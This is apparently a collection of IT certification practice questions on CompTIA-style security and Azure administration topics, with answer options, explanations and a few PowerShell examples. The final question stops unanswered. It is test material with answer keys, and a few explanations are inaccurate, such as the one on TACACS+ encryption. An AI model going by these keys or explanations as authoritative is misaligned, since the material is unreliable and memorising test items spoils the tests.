The number of passwords a user needs to remember is overwhelming, so they have started writing them down. However, the passwords aren’t particularly complicated, and the user has reused the same ones across numerous websites. What should you advise them to do?
Install a password manager.
Clear their browsing data.
Clear their browser cache.
Update their certificates.
A password manager is a tool that securely stores and manages a user’s passwords, allowing them to create and store complex passwords without having to remember each one. Here’s why it’s the best solution: Security: Password managers can generate complex, unique passwords for every account, reducing the risk of using the same password across multiple sites, which makes it easier for attackers to access multiple accounts if one password is compromised. Convenience: Instead of writing passwords down (which could be lost, stolen, or accessed by unauthorized people), a password manager securely stores them in an encrypted vault, and the user only needs to remember one master password to access all their other credentials. Efficiency: Password managers can autofill login credentials on websites, streamlining the process and reducing the temptation to use simple or repeated passwords. Why the other options are incorrect: Clear their browsing data: While clearing browsing data can remove stored cookies and other site-related information, it does not address the root issue of remembering and managing passwords. It won’t make passwords more secure. Clear their browser cache: Similar to clearing browsing data, clearing the cache only removes temporary files. It doesn’t affect the security or management of passwords and doesn’t solve the problem of having too many passwords to remember. Update their certificates: Updating certificates is related to ensuring secure connections and is not directly connected to password management or improving security in terms of remembering and storing passwords. Conclusion: The most secure and efficient way to manage numerous passwords is to install a password manager. This will allow the user to create unique, strong passwords for each account and securely store them in one place.
You are setting up a wired network and a SOHO router for a small office. The management is worried that staff members will surf websites that contain objectionable material. Which router feature should you look for to block such access?
Content filtering.
Port forwarding/mapping.
VPN access.
Disabling ports.
Content filtering is a feature that allows the router to block access to websites based on their content. It can be configured to prevent access to objectionable or inappropriate websites by filtering the traffic that passes through the router based on specific criteria such as categories of websites (e.g., adult content, gambling, etc.) or URLs. This is the most effective solution for controlling what users can access on the internet. Many SOHO routers come with built-in content filtering features, or you can set up third-party DNS services like OpenDNS to filter content. Why the other options are incorrect: Port forwarding/mapping: This feature is used to direct traffic from certain ports to specific devices within your local network. It is not used for filtering or blocking web content. VPN access: A VPN (Virtual Private Network) allows users to connect securely to a remote network, but it does not help with filtering out objectionable content. In fact, a VPN could allow users to bypass restrictions if not properly managed. Disabling ports: Disabling specific ports might prevent certain services or protocols (e.g., FTP or remote desktop) from functioning but will not block access to websites or filter out specific content on the internet. Therefore, content filtering is the ideal choice for blocking access to objectionable websites and controlling the types of sites staff members can access.
Which open-source authentication protocol employs a third party to verify user credentials and encrypts the authentication exchange?
RADIUS
Kerberos
AES
TACACS+
Kerberos is a network authentication protocol that employs a third-party (called the Key Distribution Center (KDC)) to verify user credentials in a secure way. It is based on a ticketing system to ensure secure authentication between users and services over a network. Here’s how it works: User Authentication: The user requests authentication from the KDC, which checks the credentials. Ticket Granting: Once the user is authenticated, the KDC provides a ticket that can be used to access various services within the network. Encryption: The Kerberos protocol uses symmetric encryption to securely communicate between the user, the KDC, and the services, ensuring that user credentials and data are protected. Why Kerberos is correct: Third-Party Verification: The KDC acts as a third party, verifying user credentials and issuing authentication tickets. Open Source: While Kerberos was originally developed by MIT and can be implemented as an open-source protocol (e.g., MIT Kerberos), it’s widely used across many systems. Why the other options are incorrect: RADIUS: While RADIUS does provide a form of third-party authentication, it is not encryption-based in the same way Kerberos is. AES: AES is an encryption standard, not an authentication protocol. TACACS+: A proprietary protocol similar to RADIUS, but it is not open-source and does not operate based on encryption in the same way Kerberos does. Therefore, Kerberos is the correct choice because it uses a third-party (KDC) to verify credentials and provides encryption-based authentication.
Employees are permitted to use their own devices while working for your company. You, as the IT director, are worried about the security of any company data stored on those devices. Which technology should you use?
UAC
EFS
SSO
MDM
Mobile Device Management (MDM) is a technology that allows you to manage and secure employees’ personal devices (also known as BYOD — Bring Your Own Device). It enables you to: Enforce security policies (e.g., requiring strong passwords, encryption, remote wipe). Monitor and control the apps and data on those devices. Secure company data by separating it from personal data and remotely wiping data if a device is lost or stolen. Why the other options are incorrect: UAC (User Account Control): A security feature in Windows that prevents unauthorized changes to the operating system. It is more about local system security than managing mobile devices. EFS (Encrypting File System): A feature that provides file-level encryption on Windows devices. While useful for protecting data, it doesn’t address device management or overall security of personal devices. SSO (Single Sign-On): A system that allows users to log in once to access multiple services, improving usability, but it doesn’t specifically address securing personal devices. Therefore, MDM is the most appropriate technology to secure company data on employees’ personal devices.
What is NOT a biometric identification device?
Fingerprint reader
Palm print scanner
Retina scanner
Hard token
A hard token is a physical object (like a USB token, smart card, or key fob) used for authentication. It provides a possession factor (“something you have”) in multifactor authentication but does not use any biological characteristics for identification. The other options—Fingerprint reader, Palmprint scanner, and Retina scanner—are all biometric identification devices. They authenticate identity based on unique physical traits: Fingerprint reader: scans and matches fingerprint patterns. Palmprint scanner: scans the lines and features of the palm. Retina scanner: scans the blood vessel patterns in the retina. Therefore, Hard token is the correct answer because it does not perform biometric identification.
You sign up for Azure Active Directory (Azure AD) Premium. You need to add a user named admin1@contoso.com as an administrator on all the computers that will be joined to the Azure AD domain. What should you configure in Azure AD?
Device settings from the Devices blade
Providers from the MFA Server blade
User settings from the Users blade
General settings from the Groups blade
When a computer is Azure AD joined, local administrator rights are not automatically assigned to all users. However, Azure AD allows you to configure who will be a local administrator on all devices joined to the domain. This setting is found in the Device settings section under the Devices blade in Azure Active Directory. Steps to make admin1@contoso.com an administrator on all Azure AD-joined devices: navigate to Azure Active Directory in the Azure portal; in the Azure AD menu, select Devices → Device settings; find the option “Additional local administrators on Azure AD joined devices”, add the user admin1@contoso.com to this setting, and save the changes. Why not the other options? b) Providers from the MFA Server blade: the MFA Server blade is for multi-factor authentication settings and has nothing to do with device administration. c) User settings from the Users blade: the Users blade is for managing individual users but does not control device-level permissions such as local admin rights. d) General settings from the Groups blade: the Groups blade is used for managing group memberships and roles, not device administration settings.
You have a deployment template named Template1 that is used to deploy 10 Azure web apps. You need to identify what to deploy before you deploy Template1. The solution must minimize Azure costs. What should you identify?
five Azure Application Gateways
one App Service plan
10 App Service plans
one Azure Traffic Manager
one Azure Application Gateway
In Azure, App Service plans define the compute resources (CPU, memory, and storage) that host one or more web apps. Since you need to deploy 10 Azure web apps, the most cost-effective solution is to deploy them under a single App Service plan rather than creating 10 separate plans (which would increase costs). How App Service plans work: an App Service plan determines pricing and scaling for web apps. Multiple web apps can share a single App Service plan, meaning they share resources instead of being billed separately. If all 10 web apps are deployed under the same App Service plan, you pay for one set of resources instead of 10 (see the sketch below). Why not the other options? a) Five Azure Application Gateways: Application Gateway is a layer 7 load balancer for managing traffic and is not required for deploying web apps; you certainly do not need five of them before deployment. c) 10 App Service plans: this would create 10 separate compute environments, leading to unnecessary cost increases; a single App Service plan can handle multiple web apps. d) One Azure Traffic Manager: Traffic Manager is a DNS-based load balancer for global traffic distribution, useful for multi-region deployments but not required before deploying web apps. e) One Azure Application Gateway: Application Gateway is for managing incoming traffic with WAF (Web Application Firewall) and SSL termination, but it is not a prerequisite for deploying web apps.
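To make the cost point concrete, here is a minimal Az PowerShell sketch that creates a single App Service plan and places all 10 web apps in it. The resource group, plan, region, and app names are hypothetical placeholders (web app names must be globally unique):

    # All names below are hypothetical placeholders.
    New-AzResourceGroup -Name "RG1" -Location "eastus"

    # One App Service plan = one set of billed compute resources.
    New-AzAppServicePlan -ResourceGroupName "RG1" -Name "Plan1" -Location "eastus" -Tier "Standard"

    # All 10 web apps share the same plan, so they share (and are billed for) the same resources.
    1..10 | ForEach-Object {
        New-AzWebApp -ResourceGroupName "RG1" -Name ("contoso-webapp{0:d2}" -f $_) -Location "eastus" -AppServicePlan "Plan1"
    }

Creating 10 separate plans would simply multiply the compute cost without changing what the apps can do.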
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You choose the Allow gateway transit setting on VirtualNetworkA. Does the solution meet the goal?
Yes
No
The issue is that while virtual network peering allows communication between VirtualNetworkA and VirtualNetworkB, it does not automatically enable Point-to-Site (P2S) VPN clients to access the peered network (VirtualNetworkB). Why does “Allow gateway transit” not solve the problem? “Allow gateway transit” is used for VNet-to-VNet connections when one VNet has a VPN gateway and the other VNet (without a gateway) needs to use it for outbound traffic. This setting allows VirtualNetworkB to use the VPN gateway in VirtualNetworkA for on-premises traffic; however, it does not apply to P2S VPN clients trying to connect to VirtualNetworkB. Why can’t the Windows 10 workstation access VirtualNetworkB? When a P2S VPN client connects to VirtualNetworkA, by default it can only access resources in VirtualNetworkA. Virtual network peering does not automatically enable P2S clients to access the peered network (VirtualNetworkB), because P2S routes do not propagate through VNet peering by default. Correct solution to meet the goal: to allow Point-to-Site VPN clients to access VirtualNetworkB, you must enable “Use Remote Gateway” on VirtualNetworkB, which allows VirtualNetworkB to send traffic through VirtualNetworkA’s VPN gateway; configure route tables for P2S VPN clients by adding a custom route so that the P2S configuration includes VirtualNetworkB’s address space; and modify the P2S VPN configuration to ensure it includes VirtualNetworkB’s address space in the routing table.
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You choose the Allow gateway transit setting on VirtualNetworkB. Does the solution meet the goal?
Yes
No
The issue is that Point-to-Site (P2S) VPN clients connected to VirtualNetworkA cannot automatically access VirtualNetworkB through virtual network peering. Simply enabling “Allow gateway transit” on VirtualNetworkB does not solve this issue because P2S VPN routes are not automatically propagated through VNet peering. Why does “Allow gateway transit” on VirtualNetworkB not work? “Allow gateway transit” allows a VNet without a VPN gateway (VirtualNetworkB) to use a gateway in a peered VNet (VirtualNetworkA). This setting is only applicable to VNet-to-VNet connections, not Point-to-Site (P2S) VPN connections, and P2S VPN clients connected to VirtualNetworkA do not automatically inherit peering routes to VirtualNetworkB. Why can’t the Windows 10 workstation access VirtualNetworkB? When a P2S VPN client connects to VirtualNetworkA, it can only access resources in VirtualNetworkA by default; virtual network peering does not automatically allow P2S VPN traffic to flow to a peered network (VirtualNetworkB), and P2S VPN routes are not automatically advertised to peered VNets unless explicitly configured. Correct solution to meet the goal: to allow Point-to-Site VPN clients to access VirtualNetworkB, enable “Use Remote Gateway” on VirtualNetworkB so that it uses VirtualNetworkA’s VPN gateway for traffic routing; modify the P2S VPN configuration to ensure it includes VirtualNetworkB’s address space in the routing table; and manually configure route tables (UDR, user-defined routes) by adding a custom route for the P2S VPN configuration that includes VirtualNetworkB’s address space, so that P2S VPN clients know how to reach VirtualNetworkB.
Your company’s Azure subscription includes two Azure networks named VirtualNetworkA and VirtualNetworkB. VirtualNetworkA includes a VPN gateway that is configured to make use of static routing. Also, a site-to-site VPN connection exists between your company’s on-premises network and VirtualNetworkA. You have configured a point-to-site VPN connection to VirtualNetworkA from a workstation running Windows 10. After configuring virtual network peering between VirtualNetworkA and VirtualNetworkB, you confirm that you can access VirtualNetworkB from the company’s on-premises network. However, you find that you cannot establish a connection to VirtualNetworkB from the Windows 10 workstation. You have to make sure that a connection to VirtualNetworkB can be established from the Windows 10 workstation. Solution: You downloaded and reinstalled the VPN client configuration package on the Windows 10 workstation. Does the solution meet the goal?
Yes
No
When a Point-to-Site (P2S) VPN client connects to VirtualNetworkA, it follows the routing configuration provided in the VPN client configuration package. If VirtualNetworkB was not included in the original configuration, the VPN client will not know how to reach it. By re-downloading and reinstalling the VPN client configuration package, the client receives the updated routing information that includes VirtualNetworkB, allowing the workstation to establish a connection. Why does this work? VPN configuration packages contain route information: when a VPN client connects, it only knows how to route traffic based on the configuration package it was given at the time of download, so if VirtualNetworkB was not originally included, the VPN client would not know how to send traffic there. Re-downloading the VPN client configuration updates the routes: when you enable virtual network peering and configure VirtualNetworkA to forward traffic, Azure updates the routing table, and by reinstalling the updated VPN client the Windows 10 workstation receives the new routes, allowing it to access VirtualNetworkB. Why not other solutions? Simply enabling virtual network peering is not enough because P2S VPN clients do not automatically inherit peering routes; manually configuring routes could work, but reinstalling the VPN client package is the simplest and most effective way to ensure the correct routes are applied. A sketch of regenerating the client package with PowerShell follows.
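This is a sketch only: the gateway and resource group names are hypothetical placeholders, certificate (EapTls) authentication is assumed, and the property holding the download URL may differ by Az.Network version.

    # Regenerate the P2S client configuration for the gateway on VirtualNetworkA
    # and retrieve the download URL of the updated package (placeholder names).
    $clientConfig = New-AzVpnClientConfiguration -ResourceGroupName "RG1" `
        -Name "VNetA-Gateway" -AuthenticationMethod "EapTls"

    # URL of the zip package to download and install on the Windows 10 workstation.
    $clientConfig.VpnProfileSASUrl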
Your company wants to have some post-deployment configuration and automation tasks on Azure Virtual Machines. Solution: As an administrator, you suggested using ARM templates. Does the solution meet the goal?
Yes
No
Azure Resource Manager (ARM) templates are primarily used for infrastructure as code (IaC) to deploy and configure Azure resources. However, ARM templates are not well suited for post-deployment configuration and automation tasks inside virtual machines (VMs). Why ARM templates are not the right solution: ARM templates are declarative; they define what resources should be created, but they are not designed for post-deployment automation inside a VM. While ARM templates allow you to configure VM properties (e.g., networking, OS type, extensions), they lack advanced automation capabilities for tasks like installing software, configuring applications, or running scripts inside the VM after deployment. Correct solutions for post-deployment configuration and automation inside Azure VMs include: Azure Virtual Machine Extensions, such as the Custom Script Extension to run scripts inside the VM post-deployment, or PowerShell DSC (Desired State Configuration), Chef, or Puppet to install and configure software; Azure Automation and Runbooks, which can execute scripts against Azure VMs; Azure Automanage, which simplifies post-deployment configuration of Windows/Linux VMs by applying best practices automatically; and Azure DevOps Pipelines or GitHub Actions, which can trigger post-deployment scripts or Ansible playbooks.
Your company wants to have some post-deployment configuration and automation tasks on Azure Virtual Machines. Solution: As an administrator, you suggested using Virtual machine extensions. Does the solution meet the goal?
Yes
No
Azure Virtual Machine Extensions are the correct choice for post-deployment configuration and automation tasks on Azure Virtual Machines (VMs). These extensions allow administrators to execute scripts, install software, configure settings, and automate management tasks after the VM has been deployed. Why virtual machine extensions are the right solution: Designed for post-deployment tasks: VM extensions allow you to perform custom configurations, automation, and updates after a VM has been deployed. Supports various automation tools: the Custom Script Extension runs PowerShell or Bash scripts for post-deployment configuration; the Azure Desired State Configuration (DSC) Extension keeps VMs in a predefined, desired state; third-party tools such as Chef, Puppet, or Ansible can be integrated for configuration management. No need for manual intervention: once a VM is deployed, VM extensions can be applied automatically, reducing the need for manual configuration. Examples of what VM extensions can do: install software (e.g., IIS, SQL Server, Apache, or custom applications); configure firewall rules or security settings; apply patches or updates after deployment; deploy monitoring agents (Azure Monitor, Log Analytics, Microsoft Defender for Cloud). Why other solutions like ARM templates are not enough: ARM templates can define VM properties but do not automate tasks inside the VM after deployment; Azure Automation is useful for broader automation but does not run inside the VM like extensions do. A minimal sketch using the Custom Script Extension follows.
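The following hedged sketch runs a post-deployment script via the Custom Script Extension with Az PowerShell; the resource names and script URL are hypothetical placeholders:

    # Run a script inside VM1 after deployment using the Custom Script Extension.
    # Resource names and the script URL are placeholders.
    Set-AzVMCustomScriptExtension -ResourceGroupName "RG1" -VMName "VM1" `
        -Location "eastus" -Name "PostDeployConfig" `
        -FileUri "https://example.blob.core.windows.net/scripts/setup.ps1" `
        -Run "setup.ps1"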
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com. User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User4 to create the user accounts. Does that meet the goal?
Yes
No
User4 has the Owner role at the Azure subscription level, but not in Azure Active Directory (Azure AD). Managing users in Azure AD requires specific directory roles, such as Global Administrator or User Administrator. Why User4 cannot create user accounts: Azure subscription roles (e.g., Owner, Contributor) apply to resources within the subscription (such as VMs, storage, and networking), whereas Azure AD roles (e.g., Global Administrator, User Administrator) apply to identity and user management. Since User4 is an Owner at the subscription level, they do not have any privileges to manage Azure AD users in external.contoso.onmicrosoft.com. Who can create users in external.contoso.onmicrosoft.com? User1, who created the tenant and is therefore its Global Administrator, can create and manage users there; User2 and User3 could do so only after being assigned an appropriate role (Global Administrator or User Administrator) in the new tenant.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com. User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User3 to create the user accounts. Does that meet the goal?
Yes
No
User3 has the User Administrator role in the contoso.onmicrosoft.com Azure AD tenant. However, this role does not automatically grant permissions in the new tenant (external.contoso.onmicrosoft.com) that User1 created. Why User3 cannot create user accounts: Azure AD roles are tenant-specific. User3’s User Administrator role applies only to contoso.onmicrosoft.com, not to external.contoso.onmicrosoft.com. Since the new tenant (external.contoso.onmicrosoft.com) is a separate directory, User3 does not have any assigned roles there by default. Only users with appropriate roles in the new tenant can create users. When User1 created external.contoso.onmicrosoft.com, they became a Global Administrator of that new tenant; other users from contoso.onmicrosoft.com do not automatically get any roles in the new tenant. Who can create users in external.contoso.onmicrosoft.com? User1 (Global Administrator in external.contoso.onmicrosoft.com) can create users; User2 can create users only if assigned Global Administrator in the new tenant.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com. User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User2 to create the user accounts. Does that meet the goal?
Yes
No
User2 has the Global Administrator role in the contoso.onmicrosoft.com Azure AD tenant. However, this role does not automatically apply to the new tenant (external.contoso.onmicrosoft.com) that User1 created. Why User2 cannot create user accounts: Azure AD roles are tenant-specific. Being a Global Administrator in contoso.onmicrosoft.com does not grant any permissions in external.contoso.onmicrosoft.com. Since external.contoso.onmicrosoft.com is a separate Azure AD tenant, User2 does not have any administrative privileges there by default. Who gets admin rights in the new tenant? The user who creates a new tenant (User1) automatically becomes a Global Administrator in that new tenant; other users from the original tenant (contoso.onmicrosoft.com) do not get any roles in the new tenant unless explicitly assigned. Who can create users in external.contoso.onmicrosoft.com? User1 (Global Administrator in external.contoso.onmicrosoft.com) can create users. Correct solution: to allow User2 to create user accounts, User1 must first add User2 as a Global Administrator in external.contoso.onmicrosoft.com.
You have an Azure subscription that contains the following users in an Azure Active Directory tenant named contoso.onmicrosoft.com. User1 creates a new Azure Active Directory tenant named external.contoso.onmicrosoft.com. You need to create new user accounts in external.contoso.onmicrosoft.com. Solution: You instruct User1 to create the user accounts. Does that meet the goal?
Yes
No
When User1 creates the new Azure Active Directory (Azure AD) tenant external.contoso.onmicrosoft.com, they automatically become a Global Administrator for that new tenant. Why can User1 create user accounts? The creator of a new Azure AD tenant becomes a Global Administrator: in Azure AD, the user who creates a new tenant is automatically assigned the Global Administrator role in that tenant. Since User1 created external.contoso.onmicrosoft.com, they have full administrative control, including user management. A Global Administrator has full control over Azure AD, including the ability to create, modify, and delete users; assign roles to users; and manage groups and directory settings. Who else can create users in external.contoso.onmicrosoft.com? User1 (Global Administrator in the new tenant) can create users, as can any other user assigned Global Administrator or User Administrator in external.contoso.onmicrosoft.com. Why can’t other users from contoso.onmicrosoft.com create users? User2 (Global Administrator in contoso.onmicrosoft.com) has no permissions in the new tenant unless assigned; User3 (User Administrator in contoso.onmicrosoft.com) has no permissions in the new tenant unless assigned; User4 (Owner of the Azure subscription) holds an Azure subscription role, which does not grant permissions in Azure AD. A sketch of creating a user in the new tenant follows.
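This sketch uses the (now legacy) AzureAD PowerShell module; the connection must target the new tenant explicitly, and every value below is a hypothetical placeholder:

    # Connect to the NEW tenant; roles from contoso.onmicrosoft.com do not carry over.
    Connect-AzureAD -TenantId "external.contoso.onmicrosoft.com"

    # Placeholder password profile for the example user.
    $passwordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
    $passwordProfile.Password = "P@ssw0rd-Placeholder1"

    New-AzureADUser -DisplayName "Test User" `
        -UserPrincipalName "testuser@external.contoso.onmicrosoft.com" `
        -MailNickName "testuser" -AccountEnabled $true -PasswordProfile $passwordProfile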
You create an Azure Storage account. You plan to add 10 blob containers to the storage account. You need to use a different key for one of the containers to encrypt data at rest. What should you do before you create the container?
Generate a shared access signature (SAS)
Modify the minimum TLS version
Rotate the access keys
Create an encryption scope
Azure Storage automatically encrypts data at rest using Microsoft-managed keys by default. However, if you need to encrypt data in a specific blob container using a different key (such as a customer-managed key stored in Azure Key Vault), you must first create an encryption scope. An encryption scope allows you to define a unique encryption configuration within a storage account. Each blob container in the storage account can be assigned a different encryption scope, enabling you to use different keys for different containers. Steps: Create an encryption scope in the Azure Storage account. You can choose to use a Microsoft-managed key or a customer-managed key (CMK). Specify the encryption scope when creating the blob container. Any blobs added to that container will be encrypted using the specified encryption scope and key. Why not the other options? (a) Generate a shared access signature (SAS) A SAS token provides secure, limited-time access to resources but does not control encryption at rest. It is used for authentication and authorization, not encryption. (b) Modify the minimum TLS version Changing the TLS version affects transport security, not data encryption at rest. TLS is used to secure data in transit. (c) Rotate the access keys Rotating access keys helps improve security by refreshing authentication credentials but does not allow you to use a different encryption key for a specific container.
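A hedged Az PowerShell sketch of the two steps (parameter names reflect recent Az.Storage versions and may differ in older ones; all names are hypothetical placeholders):

    # 1. Create an encryption scope in storage1 (Microsoft-managed key shown;
    #    use -KeyvaultEncryption -KeyUri <key URI> instead for a customer-managed key).
    New-AzStorageEncryptionScope -ResourceGroupName "RG1" -StorageAccountName "storage1" `
        -EncryptionScopeName "scope1" -StorageEncryption

    # 2. Create the container with that scope as its default; blobs written to it
    #    are encrypted with the scope's key.
    $ctx = (Get-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1").Context
    New-AzStorageContainer -Name "container1" -Context $ctx `
        -DefaultEncryptionScope "scope1" -PreventEncryptionScopeOverride $true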
You have an Azure Active Directory (Azure AD) tenant named contosocloud.onmicrosoft.com. Your company has a public DNS zone for contoso.com. You add contoso.com as a custom domain name to Azure AD. You need to ensure that Azure can verify the domain name. Which type of DNS record should you create?
MX
NSEC
PTR
RRSIG
When you add a custom domain (e.g., contoso.com) to Azure Active Directory (Azure AD), you must verify domain ownership. Azure AD provides a verification code that you must add as a DNS record in your domain’s public DNS zone. To verify the domain, Azure AD supports adding either an MX record or a TXT record. While TXT records are commonly used, MX records are also a valid option. Why use an MX record? An MX (Mail Exchange) record is used for routing emails, but Azure AD allows it for domain verification purposes. Azure AD provides an MX record value (e.g., xxxxxxxxx.msv1.invalid) that you must add to your DNS provider. Once the MX record is propagated, Azure AD can verify the domain. No email functionality is affected because the provided MX record is not a functional mail server—it is only for verification. Why not the other options? (b) NSEC (Next Secure Record) Used in DNSSEC (Domain Name System Security Extensions) to prevent DNS spoofing, but not related to domain verification. (c) PTR (Pointer Record) Used for reverse DNS lookups (mapping an IP address to a domain), but not for verifying domain ownership. (d) RRSIG (Resource Record Signature) A DNSSEC record used to ensure integrity and authenticity of DNS data but does not help in domain verification.
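If the contoso.com zone is hosted in Azure DNS, the verification record could be added with Az PowerShell roughly as follows. The exchange value and preference below are placeholders; use the exact values Azure AD displays during verification:

    # Add the Azure AD verification MX record at the zone apex (placeholder values).
    $mxRecord = New-AzDnsRecordConfig -Exchange "xxxxxxxxx.msv1.invalid" -Preference 32767

    New-AzDnsRecordSet -ResourceGroupName "RG1" -ZoneName "contoso.com" `
        -Name "@" -RecordType MX -Ttl 3600 -DnsRecords $mxRecord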
You run a small company that sells its products online with a web server and a SOHO router. You have paid the ISP for a specific IP address that is yours and won’t change since you don’t want the IP address of your web server to change. On your router, what would you configure for your ISP connection?
Screened subnet
Dynamic WAN IP
UPnP
Static WAN IP
A Static WAN IP is an IP address assigned to your router’s Wide Area Network (WAN) interface that does not change over time. Since your company has paid your ISP for a fixed IP address, you need to configure the router’s WAN settings with that static IP, along with the corresponding subnet mask, gateway, and DNS settings provided by the ISP. This is essential for: Hosting a web server, as clients need a consistent IP to reach it. Ensuring reliable DNS mapping to your domain name. Why the other options are incorrect: Dynamic WAN IP: Assigned automatically by the ISP and may change, which is not suitable for hosting a server. UPnP (Universal Plug and Play): Used to automatically open ports for devices inside the network, not for setting IP addresses. Screened subnet (DMZ): A secure network zone for public-facing servers, but it doesn’t relate to how your router gets its WAN IP.
You create an Azure Storage account named storage1. You plan to create a file share named data1. Users need to map a drive to the data1 file share from home computers that run Windows 10. Which outbound port should you open between the home computers and the data1 file share?
80
443
445
3389
Port 80 is HTTP, used for web traffic. Port 443 is HTTPS, also for web traffic. Port 445 is the port used by the SMB protocol for file sharing, which is what mapping a drive to an Azure file share requires. Port 3389 is the Remote Desktop Protocol (RDP) port. Therefore, outbound port 445 must be open between the home computers and the file share.
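A quick way to confirm this from a home computer, sketched in PowerShell; the storage account name, share name, and key are hypothetical placeholders:

    # Verify that outbound TCP 445 is reachable from the home computer.
    Test-NetConnection -ComputerName "storage1.file.core.windows.net" -Port 445

    # Map drive Z: to the Azure file share over SMB, authenticating with the
    # storage account key (placeholder shown; substitute the real key).
    cmd /c "net use Z: \\storage1.file.core.windows.net\data1 /user:Azure\storage1 <storage-account-key>"

Many ISPs block outbound port 445, in which case the Test-NetConnection check will fail even though the share itself is configured correctly.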
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You create a new user account in the on-premises Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You use Active Directory Sites and Services to force replication of the Global Catalog on a domain controller. Does the solution meet the goal?
Yes
No
The problem requires forcing an immediate synchronization of a newly created on-premises Active Directory (AD) user to Azure AD. However, the proposed solution—using Active Directory Sites and Services to force replication of the Global Catalog on a domain controller—only replicates data within on-premises domain controllers. It does not trigger synchronization to Azure AD. Why is the proposed solution incorrect? Active Directory Sites and Services is used to manage replication between domain controllers (DCs) in an on-premises AD environment. Forcing replication of the Global Catalog (GC) only ensures that changes are propagated among domain controllers within the on-premises infrastructure. However, Azure AD Connect (DirSync) is responsible for syncing changes from on-premises AD to Azure AD. Simply forcing replication between DCs does not push the changes to Azure AD.
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You create a new user account in the on-premises Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You run the Start-ADSyncSyncCycle -PolicyType Initial PowerShell cmdlet. Does the solution meet the goal?
Yes
No
The goal is to replicate the newly created user account from on-premises Active Directory (AD) to Azure AD immediately. The proposed solution suggests running the following PowerShell command: Start-ADSyncSyncCycle -PolicyType Initial. While this does trigger synchronization, it is not the most efficient option: an “Initial” sync performs a full synchronization, which includes all objects in AD, not just the recent changes, and a full sync is slower and more resource-intensive than necessary. Since we only need to sync the newly created user, a delta sync is more appropriate. Instead of an initial sync, the best approach is to run a delta sync, which synchronizes only the recent changes (e.g., newly added users): Start-ADSyncSyncCycle -PolicyType Delta. Delta sync is faster and syncs only the recent changes, ensuring that the new user appears in Azure AD without affecting other objects; initial sync should only be used if there is a major configuration change or if Azure AD Connect is being set up for the first time.
Your company has an Azure Active Directory (Azure AD) tenant named weyland.com that is configured for hybrid coexistence with the on-premises Active Directory domain. You have a server named DirSync1 that is configured as a DirSync server. You create a new user account in the on-premises Active Directory. You now need to replicate the user information to Azure AD immediately. Solution: You run the Start-ADSyncSyncCycle -PolicyType Delta PowerShell cmdlet. Does the solution meet the goal?
Yes
No
The goal is to immediately synchronize a newly created user account from on-premises Active Directory (AD) to Azure AD. The proposed solution runs the following PowerShell command: Start-ADSyncSyncCycle -PolicyType Delta This successfully meets the requirement because: “Delta” synchronization only syncs the changes (new users, modified attributes, deletions, etc.) instead of performing a full synchronization. It is fast and efficient, ensuring that the newly created user is replicated to Azure AD immediately. It avoids unnecessary processing compared to an “Initial” sync, which would resync all objects. Why This Works? Azure AD Connect (DirSync) is responsible for synchronizing on-premises AD objects to Azure AD. By default, synchronization happens every 30 minutes. The Start-ADSyncSyncCycle -PolicyType Delta command forces an immediate sync of only recent changes instead of waiting for the next scheduled sync.
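On the DirSync/Azure AD Connect server (DirSync1), the sync schedule can be checked and the delta sync forced with the ADSync module, for example:

    # Run on DirSync1 (the Azure AD Connect / DirSync server).
    Import-Module ADSync

    Get-ADSyncScheduler                      # shows the sync interval and next scheduled run
    Start-ADSyncSyncCycle -PolicyType Delta  # pushes only the recent changes to Azure AD now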
You have an Azure subscription. In the Azure portal, you plan to create a storage account named storage1 that will have the following settings: Performance: Standard; Replication: Zone-redundant storage (ZRS); Access tier (default): Cool; Hierarchical namespace: Disabled. You need to ensure that you can set Account kind for storage1 to BlockBlobStorage. Which setting should you modify first?
Performance
Replication
Access tier (default)
Hierarchical namespace
